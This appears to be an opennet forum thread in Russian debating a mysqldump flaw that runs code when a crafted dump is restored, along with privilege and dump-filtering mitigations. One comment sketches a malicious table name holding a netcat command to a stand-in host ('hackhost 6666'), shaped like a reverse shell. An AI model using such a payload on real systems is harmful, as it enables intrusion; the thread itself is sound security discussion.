Вариант для распечатки		Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы		[ Отслеживать ]

Уязвимость в mysqldump, позволяющая выполнить код при восста..., opennews (ok), 11-Мрт-17, (0) [смотреть все] Ну и бред Уязвимость тут на столько мифическая, что о ней можно и не говорить, Gemorroj (ok), 10:11 , 11-Мрт-17, (1) –12 // Не согласен, уязвимость хороша именно тем, что на первый взгляд кажется бесполез, Аноним (-), 10:16 , 11-Мрт-17, (2) +5 // Да, но это скорее еще один трюк из разряда методов социнженерии, чем реальная уя, KonstantinB (ok), 17:00 , 11-Мрт-17, (36) –1 // Более того, можно сделать так чтобы через браузер показывалось одно, а при загру, Аноним (-), 18:25 , 11-Мрт-17, (39) Ясен пень, что смотреть надо то, что запускать собрался, а не что там в браузере, KonstantinB (ok), 20:57 , 11-Мрт-17, (45) А в чем принципиальное отличие от старомодного скачать и запустить , angra (ok), 21:35 , 11-Мрт-17, (48) Старомодное предполагает разумный промежуточный шаг посмотреть, что собрался за, KonstantinB (ok), 21:41 , 11-Мрт-17, (49) Ни разу не видел, чтобы в инструкции был шаг Посмотрите, что вы собираетесь зап, angra (ok), 23:34 , 11-Мрт-17, (51) Не работайте под рутом тоже обычно не пишут в инструкциях по установке ПО Я о , KonstantinB (ok), 23:53 , 11-Мрт-17, (52) Вообще-то обычно в инструкциях указывается какие шаги делаются под пользователем, angra (ok), 00:25 , 12-Мрт-17, (56) Если curl взбрыкивает , то проблема либо с MITM, либо с тем местом, откуда раст, KonstantinB (ok), 03:27 , 13-Мрт-17, (64) –1 Сдается мне, что кое-кто не знает как работает механизм доверия ssl сертификату , angra (ok), 06:43 , 13-Мрт-17, (66) про -k и его более длинный алиас curl, кажется, сам подсказывает - если с wget, тигар (ok), 09:18 , 13-Мрт-17, (69) Очень даже может быть Но в таких случаях обычно звучит что-то вроде я же не ад, angra (ok), 10:15 , 13-Мрт-17, (71) Дада, проверьте что там в несколькогигабайтовом дампе базы данных, а потом расск, deadfood (ok), 20:13 , 12-Мрт-17, (61) +1 Если дамп мой - я и так знаю, что в нем Если нет - то в голову никогда не придет, KonstantinB (ok), 03:30 , 13-Мрт-17, (65) –1 в нем - create table shit nc hackhost 6666 dev null nc -, пох (?), 13:05 , 13-Мрт-17, (72) В дамп из-за sql injection Ну-ка наваляйте proof of concept , KonstantinB (ok), 16:00 , 13-Мрт-17, (75) только реалистичный, а не код, создающий динамически таблицы с подстановкой п, KonstantinB (ok), 16:04 , 13-Мрт-17, (76) 1 арендуешь шаредхостинг 2 создаешь сайт визитку 3 в mysql делаешь табличку , Аноним (-), 12:05 , 11-Мрт-17, (12) +6 // чем это отличается от ручного выполнения sql запроса из той же админки то, что , Gemorroj (ok), 12:58 , 11-Мрт-17, (14) –2 // Восстановление может делаться из-под более привилегированного юзера , Аноним (-), 18:27 , 11-Мрт-17, (40) +6 А почему собственно косяк в парсере не может быть уязвимостью , apollo2k4 (ok), 12:14 , 11-Мрт-17, (13) +3 // конкретно в mysqldump она не имеет ценности в силу сложности ее использования а, Gemorroj (ok), 13:00 , 11-Мрт-17, (15) –2 // Если вы не можете придумать, как это использовать, это не означает, что это нево, XoRe (ok), 23:55 , 11-Мрт-17, (53) +2 Каку надо писой мыть , Павел Самсонов (?), 13:18 , 11-Мрт-17, (18) +2 // И ещё подкладывть бумажку, и кушать ампицилин , Павел Самсонов (?), 13:23 , 11-Мрт-17, (20) Один сценарий для ее использования таки существует Дампу, снятому самостоятельн, angra (ok), 13:39 , 11-Мрт-17, (24) А часто ли бывает, что кто-то имеет право создавать таблицы, но не может делать , Аноним (-), 10:16 , 11-Мрт-17, (3) // Дефолтовые настройки аккаунта для WordPress , Аноним (-), 10:39 , 11-Мрт-17, (4) А какая разница Даже если бы злоумышленник мог делать дамп и восстанавливать, э, Аноним (-), 10:44 , 11-Мрт-17, (5) // А что раньше мешало подкинуть этому аккаунту исправленный дамп Дампы то у кли, angra (ok), 13:42 , 11-Мрт-17, (25) // Когда дампы хранятся у клиентов, то и восстанавливают их обычно клиенты , Аноним (-), 14:21 , 11-Мрт-17, (32) Разве что в идеальном мире Где все клиенты люди умные и знающие, а сисадмины ну, angra (ok), 21:32 , 11-Мрт-17, (47) Первые два абзаца полная чущь Причём здесь утилита mysqldump В оригинале ясно , Ydro (?), 11:19 , 11-Мрт-17, (8) –6 // Это вы не так поняли В оригинале написано как раз про атаку через выполнение CR, Аноним (-), 11:45 , 11-Мрт-17, (11) // У вас первый абзац оригинальной статьи видимо не отображается mysqldump is a co, Ydro (?), 13:19 , 11-Мрт-17, (19) –3 // Разъясняю для непонятливых Злоумышленник создаёт в БД таблицу с многострочным и, Аноним (-), 14:28 , 11-Мрт-17, (33) 1 mysqldump создаёт обычный кекстовый файл, sql-скрипт, с комментариями и проче, oopsy (?), 14:13 , 11-Мрт-17, (31) –1 // Не надо расписывать как работает mysqldump И отчего вы забыли другие виды комме, Ydro (?), 11:38 , 12-Мрт-17, (60) –2 Так 10 1 21 подвержена этой уязвимости или нет P S В оригинале понятно что не, Ilya Indigo (ok), 11:27 , 11-Мрт-17, (9) // Там в новости ссылка на CVE по ней пройди и увидишь, что в ветке 10 1 исправлено, КО (?), 19:34 , 11-Мрт-17, (43) +1 // Благодарю , Ilya Indigo (ok), 01:00 , 12-Мрт-17, (57) Ах эта тяга к идеализму С точки зрения промышленного станка - надёжность на д, Павел Самсонов (?), 13:01 , 11-Мрт-17, (16) Бывают случаи, когда хостер переносит базу с другого хостинга или восстанавливае, Alex_K (??), 13:17 , 11-Мрт-17, (17) +1 // ШОК Оказывается нельзя выполнять произвольный sql от рута, а надо логиниться , angra (ok), 13:28 , 11-Мрт-17, (21) +4 // Самое печальное, что при этом приходится сидеть на его стуле , Павел Самсонов (?), 13:30 , 11-Мрт-17, (22) // Как тут любит говорить Led, эникеи должны страдать Не хочешь работать ногами, р, angra (ok), 13:32 , 11-Мрт-17, (23) +1 Работать ногами - не есть плохо Жим платформы ногами, например Но и головой дум, vitvegl (?), 14:06 , 11-Мрт-17, (30) Хоть иногда стенки сверлю, а то как же дом построить , Павел Самсонов (?), 14:32 , 11-Мрт-17, (34) Не путайте пользователя root внутри mysql и системного пользователя , Alex_K (??), 13:45 , 11-Мрт-17, (26) // Я и не путаю Я вообще-то про обоих говорил Принцип один и тот же , angra (ok), 13:51 , 11-Мрт-17, (27) Ок , Alex_K (??), 14:02 , 11-Мрт-17, (29) Да какая разница, тот кто восстанавливает бакап обычно имеет права на файлы БД, , КО (?), 19:37 , 11-Мрт-17, (44) +1 Выводы 1 Под рутом ОС загружать сторонний дамп нельзя из-заsystem Exec, Alex_K (??), 14:00 , 11-Мрт-17, (28) +1 // нет, неправильные Правильные сторонний или даже собственноручный разницы совер, тоже аноним (?), 16:31 , 11-Мрт-17, (35) // Да и у тебя они не правильные Действия для пользователя, требующие только знан, angra (ok), 17:39 , 11-Мрт-17, (37) –1 я не знаю пароля пользователя И не имею ни малейшего желания его знать su для s, Анон_ (?), 00:03 , 12-Мрт-17, (54) +1 Ну если ты ничего о мускуле знать не хочешь, то тебе наверное лучше его не админ, angra (ok), 03:25 , 12-Мрт-17, (59) –1 apt-get remove mysqld d windows_server setup exe , Аноним (-), 08:23 , 13-Мрт-17, (68) apt-get remove работает с именами пакетов, а не бинарей на диске Ну это тебе ви, angra (ok), 10:13 , 13-Мрт-17, (70) mysql в ней ровно тот же самый и из того же источника А mssql для вебни не внут, пох (?), 17:10 , 13-Мрт-17, (78) Это, кстати, проблема именно mysql В postgresql это решаемо , KonstantinB (ok), 17:43 , 11-Мрт-17, (38) Отложить в сторонку хеш пароля пользователя, установить случайный длинный, прийт, mickvav (?), 14:27 , 14-Мрт-17, (79) Как вариант перед импортом дампа вырезать из него строки, которые начинаются с s, Alex_K (??), 19:03 , 11-Мрт-17, (41) –1 // Ну вот какую глупость только не придумают, лишь бы не делать правильно Ну выпол, angra (ok), 21:29 , 11-Мрт-17, (46) Аутиста по решению важных вопросов видно из-далека , Аноним (-), 21:46 , 11-Мрт-17, (50) –1 правильная обработка untrusted input заключается ровно в обратном - вырезать все, Анон_ (?), 00:07 , 12-Мрт-17, (55) Двойной тоже рвется , Сифилис (?), 01:49 , 12-Мрт-17, (58) В MySQL все еще не завезли нормальные ACL для разграничения Events, Trigger, , Аноним (-), 19:31 , 11-Мрт-17, (42) –1 Вообще, это большой пласт проблем, на которые в mysql никогда даже не хотели раз, gogo (?), 21:08 , 12-Мрт-17, (62) // MySQL - Legacy РСБД с грязными хаками как IE6 для веб-макак Не имеет ничего обще, Аноним (-), 21:26 , 12-Мрт-17, (63) –1 // была бы она не для веб-макак, было бы пофигу, что там нет нормального restore Э, пох (?), 13:15 , 13-Мрт-17, (73) Ну, всё, конец света, вырубайте комп А прогнать дамп на поиск сочетания нежелат, Ydro (?), 08:22 , 13-Мрт-17, (67) –2   // а в дампе - статья с опеннета, описывающая проблему ну либо вовсе статья о разр, пох (?), 13:24 , 13-Мрт-17, (74) +2   1,3,8,9,16,17,42,62

Сообщения

[Сортировка по времени | RSS]

	67. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	–2 +/–
	Сообщение от Ydro (?), 13-Мрт-17, 08:22
	Ну, всё, конец света, вырубайте комп. А прогнать дамп на поиск сочетания нежелательных ключевых слов не судьба?
	Ответить | Правка | К родителю #62 | Наверх | Cообщить модератору

	74. "Уязвимость в mysqldump, позволяющая выполнить код при восста..."	+2 +/–
	Сообщение от пох (?), 13-Мрт-17, 13:24
	> Ну, всё, конец света, вырубайте комп. А прогнать дамп на поиск сочетания > нежелательных ключевых слов не судьба? а в дампе - статья с опеннета, описывающая проблему. (ну либо вовсе статья о разработке/администреже mysql) Причем она начинается со второго гигабайта этого дампа. Тебе нужен полноценный парсер sql-синтаксиса, старательно обходящий ескейпинги, нерегулярности и чудеса собственно mysqldump. Та еще жопа. Я до сих пор бережно храню regex, вырезающий из дампа (статичного и с точно известной начинкой) нужные поля, сам ниасилил.
	Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема